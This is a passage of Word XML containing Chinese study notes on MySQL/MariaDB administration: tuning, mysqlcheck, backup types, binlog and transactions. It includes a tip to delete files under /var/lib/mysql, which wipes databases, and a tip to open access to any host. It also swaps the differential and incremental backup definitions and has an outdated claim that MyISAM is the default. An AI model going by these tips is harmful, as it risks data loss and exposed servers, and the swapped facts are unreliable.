      <w:r>
        <w:t>文件系统</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>XFS</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ext4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Btrfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>文件系统最大容量</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8EB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1EB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16EB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>最大文件大小</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8EB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16TB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16EB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>12.</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>允许的最大数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>把数据拆分成包。通常一个包就是发送到客户端的一行数据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> max_allowed_packet </w:t>
      </w:r>
      <w:r>
        <w:t>变量定义了可以被发送的最大的包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>13.</w:t>
      </w:r>
      <w:r>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>的性能优化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>有大量的测试工具可用，但我推荐你一个简单易用的。该工具被称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mysqltuner</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>使用下面的命令下载并运行它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># wget https://github.com/major/MySQLTuner-perl/tarball/master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># tar xf master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># cd major-MySQLTuner-perl-993bc18/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"># ./mysqltuner.pl </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>你将收到有关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>使用的详细报告和推荐提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>14.</w:t>
      </w:r>
      <w:r>
        <w:t>优化和修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>有时候</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:t>数据库中的表很容易崩溃，尤其是服务器意外关机、文件系统突然崩溃或复制过程中仍然访问数据库。幸运的是，有一个称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 'mysqlcheck' </w:t>
      </w:r>
      <w:r>
        <w:t>的免费开源工具，它会自动检查、修复和优化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:t>中数据库的所有表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># mysqlcheck -u root -p --auto-repair --check --optimize --all-databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t># mysqlcheck -u root -p --auto-repair --check --optimize databasename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>15.</w:t>
      </w:r>
      <w:r>
        <w:t>从数据库的性能来讲不推荐开启数据库的审计功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>要是没有启动服务的话就会说没有套接字，启动后才会创建。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>systemctl start mariadb.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Mysql.sock</w:t>
      </w:r>
      <w:r>
        <w:t>是创建与</w:t>
      </w:r>
      <w:r>
        <w:t>mysqld</w:t>
      </w:r>
      <w:r>
        <w:t>服务器相关的</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>通信端点所使用的套接字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>删掉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/var/lib/mysql </w:t>
      </w:r>
      <w:r>
        <w:t>下的文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>然后重启</w:t>
      </w:r>
      <w:r>
        <w:t>mysqld</w:t>
      </w:r>
      <w:r>
        <w:t>服务就会自动初始化，生成</w:t>
      </w:r>
      <w:r>
        <w:t>sock</w:t>
      </w:r>
      <w:r>
        <w:t>文件（在</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/my.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>中有提到）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>危险的数据库组件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>regsvr32 /u c:\windows\system32\WSHom.Ocx /s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>regsvr32 /u c:\windows\system32\shell32.dll /s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>regsvr32 /u c:\windows\system32\scrrun.dll /s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>对数据库的操作：</w:t>
      </w:r>
      <w:r>
        <w:t>CURD  Create</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Retrive</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Update</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Delete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库的几种备份：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、完全备份（</w:t>
      </w:r>
      <w:r>
        <w:t>Full Backup</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>备份全部选中的文件夹，并不依赖文件的存档属性来确定备份那些文件。在备份过程中，任何现有的标记都被清除，每个文件都被标记为已备份。换言之，清除存档属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>完全备份就是指对某一个时间点上的所有数据或应用进行的一个完全拷贝。实际应用中就是用一盘磁带对整个系统进行完全备份，包括其中的系统和所有数据。这种备份方式最大的好处就是只要用一盘磁带，就可以恢复丢失的数据。因此大大加快了系统或数据的恢复时间。然而它的不足之处在于，各个全备份磁带中的备份数据存在大量的重复信息；另外，由于每次需要备份的数据量相当大，因此备份所需时间较长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、差异备份（</w:t>
      </w:r>
      <w:r>
        <w:t>Differential Backup</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>备份自上一次完全备份之后有变化的数据。差异备份过程中，只备份有标记的那些选中的文件和文件夹。它不清除标记，也即备份后不标记为已备份文件。换言之，不清除存档属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>差异备份是指在一次全备份后到进行差异备份的这段时间内，对那些增加或者修改文件的备份。在进行恢复时，我们只需对第一次全备份和最后一次差异备份进行恢复。差异备份在避免了另外两种备份策略缺陷的同时，又具备了它们各自的优点。首先，它具有了增量备份需要时间短、节省磁盘空间的优势；其次，它又具有了全备份恢复所需磁带少、恢复时间短的特点。系统管理员只需要两盘磁带，即全备份磁带与灾难发生前一天的差异备份磁带，就可以将系统恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、增量备份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Incremental Backup </w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>备份自上一次备份（包含完全备份、差异备份、增量备份）之后有变化的数据。增量备份过程中，只备份有标记的选中的文件和文件夹，它清除标记，既：备份后标记文件，换言之，清除存档属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>增量备份是指在一次全备份或上一次增量备份后，以后每次的备份只需备份与前一次相比增加和者被修改的文件。这就意味着，第一次增量备份的对象是进行全备后所产生的增加和修改的文件；第二次增量备份的对象是进行第一次增量备份后所产生的增加和修改的文件，如此类推。这种备份方式最显著的优点就是：没有重复的备份数据，因此备份的数据量不大，备份所需的时间很短。但增量备份的数据恢复是比较麻烦的。您必须具有上一次全备份和所有增量备份磁带（一旦丢失或损坏其中的一盘磁带，就会造成恢复的失败），并且它们必须沿着从全备份到依次增量备份的时间顺序逐个反推恢复，因此这就极大地延长了恢复时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>通过上面的概念分析可以知道，差异备份与增量备份的区别在于它们备份的参考点不同：前者的参考点是上一次完全备份、差异备份或增量备份，后者的参考点是上一次完全备份。还有标记是否清除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、完全备份与差异备份</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>以每周数据备份计划为例，我们可以在星期一进行完全备份，在星期二至星期五进行差异备份。如果在星期五数据被破坏了，则你只需要还原星期一完全的备份和星期四的差异备份。这种策略备份数据需要较多的时间，但还原数据使用较少的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、完全备份与增量备份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>以每周数据备份为例，在星期一进行完全备份，在星期二至星期五进行增量备份。如果在星期五数据被破坏了，则你需要还原星期一正常的备份和从星期二至星期五的所有增量备份。这种策略备份数据需要较少的时间，但还原数据使用较多的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>检查点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>英文名为</w:t>
      </w:r>
      <w:r>
        <w:t>checkpoint</w:t>
      </w:r>
      <w:r>
        <w:t>。数据库为了提高性能，数据页在内存修改后并不是每次都会刷到磁盘上。</w:t>
      </w:r>
      <w:r>
        <w:t>checkpoint</w:t>
      </w:r>
      <w:r>
        <w:t>之前的数据页保证一定落盘了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0" w:line="660" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display" w:hint="default"/>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>更新数据库突然断电怎么办？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>#1. 如果设置了显式事务(BEGIN TRAN/COMMIT TRAN),在COMMIT前断的电,不用担心.系统会自动回滚未提交的事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SF Pro Display" w:eastAsia="SF Pro Display" w:hAnsi="SF Pro Display" w:cs="SF Pro Display"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:br/>
        <w:t>#2. 如果没有显式设置事务,系统将为每条SQL生成一个事务,再启动电脑时,事务会恢复到最后一条操作失败的SQL语句处</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:t>日志必须打开</w:t>
      </w:r>
      <w:r>
        <w:t>log-bin</w:t>
      </w:r>
      <w:r>
        <w:t>功能才能生成</w:t>
      </w:r>
      <w:r>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>配置文件中：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>log-bin = /data/3306/mysql-bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Binlog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>它记录了所有的DDL和DML(除了数据查询语句)语句，以事件形式记录，还包含语句所执行的消耗的时间。</w:t>
      </w:r>
      <w:r>
        <w:t>还可以记录每一行数据的变化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>但是这样log会很大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>或者Statement level、Row level混合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>用到MySQL的特殊功能（存储过程、触发器、函数）需使用混合模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
        </w:rPr>
        <w:t>mysqlbinlog 工具用于解析binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般通过中继实现数据的备份存储：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="676372-20180104170201549-193485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676372-20180104170201549-1934850367"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2486025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用黑洞引擎之后架构改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2895600" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="676372-20180104170636159-633787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76372-20180104170636159-633787566"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2895600" cy="3114675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查看事务是否自动提交</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>事务的</w:t>
      </w:r>
      <w:r>
        <w:t>ACID</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5191125" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="a58e294a-615d-4ea0-9fbf-064a6daec4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58e294a-615d-4ea0-9fbf-064a6daec4b2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191125" cy="2438400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>产生并发不一致性问题主要原因是破坏了事务的隔离性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>默认使用的</w:t>
      </w:r>
      <w:r>
        <w:t>MYIsam</w:t>
      </w:r>
      <w:r>
        <w:t>不支持事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>字段名字不可以纯数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在有</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下，二值逻辑转化为三值逻辑，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unknown </w:t>
      </w:r>
      <w:r>
        <w:t>介于</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>之间。有</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>的地方一般不会将查询字段的</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>显示出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; set  innodb_file_per_table on;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'on' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; set  innodb_file_per_table=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1229 (HY000): Variable 'innodb_file_per_table' is a GLOBAL variable and should be set with SET GLOBAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; set  global innodb_file_per_table=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果希望你的数据库能被任何一台机器访问的话，那么需要更改你的配置文件，似乎是把</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>改为</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>关系型数据库中的一条记录中有若干个属性，若其中某一个属性组</w:t>
